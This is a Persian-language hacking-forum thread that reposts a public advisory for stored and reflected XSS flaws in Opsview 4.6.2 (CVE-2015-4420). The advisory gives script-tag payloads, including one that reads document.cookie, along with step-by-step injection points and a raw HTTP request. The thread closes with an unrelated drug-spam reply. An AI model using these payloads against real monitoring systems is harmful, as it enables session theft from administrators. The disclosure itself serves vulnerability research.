انجمن تیم امنیتی ایران سایبر

Opsview <= 4.6.2 - Multiple XSS Vulnerabilities

شروع موضوع توسط Endless ‏15/6/15 در انجمن Vulnerability Laboratory

  1. لطفا فایل های خود را جهت ماندگاری در انجمن اپلود کنید در صورت مشاهده لینک اپلود خروجی , تاپیک حذف خواهد شد .
    بستن اطلاعیه
بستن اطلاعیه


درود مهمان گرامي؛

مهمان گرامي، براي مشاهده تالار با امکانات کامل ميبايست از طريق ايــن ليـــنک ثبت نام کنيد .

حامی مسابقات و برگزار کننده دوره های پیشرفته ارزیابی امنیت برای سازمان ها فتح پرچم (CTF)
  1. Endless
    کاربرتازه وارد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏20/12/14
    ارسال ها:
    282
    تشکر شده:
    704
    جنسیت:
    شغل:
    Hacker & Exploiter
    محل سکونت:
    Iran-Tehran
    Name:
    WhiteTiger
    Main os:
    Kali
    PHP:
    # Exploit title: Opsview 4.6.2 - Multiple XSS
    # Date: 07-06-2015
    # Vendor homepage: www.opsview.com
    # Version: 4.6.2
    # CVE: CVE-2015-4420
    # Author: Dolev Farhi @dolevf
    # Tested On: Kali Linux + Windows 7
    # Details:
    # --------
    # Opsview is a monitoring system based on Nagios Core. Opsview is prone to several stored and reflected XSS vulnerabilities in the latest version
    1. Stored XSS through a malicious check plugin
    a
    Create a plugin with the following content:
    #!/bin/bash
    echo '<script>alert("script0t0s")</script>'
    exit 2
    b
    create a new check and assign this plugin.
    conce a host uses this checknavigate to the event pagethe XSS will be injected.
    donce a user/admin acknowledges this critical event (exit 2), the code will be injected prior his acknowledgement.
    2. Stored XSS in host profile
    a
    add a host
    b
    in the description of the hostadd a description as the one below:
    <
    script>alert(document.cookie)</script>
    csave settings
    d
    once a user/admin views the host settingsXSS will be injected.
    3. Reflected XSS in Test service check page.
    aAdd a new service check
    b
    Test the new service check against any host and provide in the command line the following <script>alert("test")</script>
    cthe XSS will immediately reflect to the screen.
    response output:
    POST /state/service/166/exec HTTP/1.1
    Host
    192.168.0.20
    User
    -AgentMozilla/5.0 (X11Linux i686rv:31.0Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0
    Accept
    text/plain, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Referer: http://192.168.0.20/status/service?host_state=0&host_filter=handled&host=opsview
    Content-Length: 105
    Cookie: PHPSESSID=
    auth_tkt=
    Connection: keep-alive
    Pragma: no-cache
    Cache-Control: no-cache
    plugin_args=%3Cscript%3Ealert(%22opsview%22)%3C%2Fscript%3E&_CSRFToken=0x84BCDAD00D5111E5988CB34E7AFD915
     
  2. MOHAMAD-NOFOZI
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏13/10/14
    ارسال ها:
    442
    تشکر شده:
    598
    جنسیت:
    محل سکونت:
    ---
    Name:
    محمد
    Main os:
    Mac
    با تشکر از فعالیت خوب شما
    از این به بعد دوستانی که اکسپلویت قرار میدهند
    حداقل یه توضیح مختصری در مورد اکسپلویت یا نحوه اجرا کردن اکسپلویت و طرز حملات
    قرار بدهید که دوستان بتوانند بهره لازم از این تاپیک ها ببرند

    ./
     
    Amo Sina، WH!T3 W01F، Rz07 و یک نفر دیگر از این ارسال تشکر کرده اند.
  3. Matrisk
    کاربرتازه وارد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏15/2/20
    ارسال ها:
    24
    تشکر شده:
    0
    Name:
    Matrisk
    Main os:
    Kali
    Viagra Hombres برای نمایش این قسمت باید وارد سیستم شوید یا اینکه ثبت نام نمایید discount isotretinoin acne for sale best website visa <a href=برای نمایش این قسمت باید وارد سیستم شوید یا اینکه ثبت نام نمایید>Cialis</a> Generique Propecia Canada
     
بارگذاری...

کاربرانی که از تاپیک دیدن کرده اند (کل: 7)

  1. Monocots57
  2. hackerman1
  3. Ruiner
  4. Juaninator
  5. DawnInAllah
  6. Enetpropo
  7. Matrisk
به انجمن تخصصی امنیت ایران سایبر خوش آمدید . برای مشاهده تمامی تالار ها و امکانات ثبت نام کنید .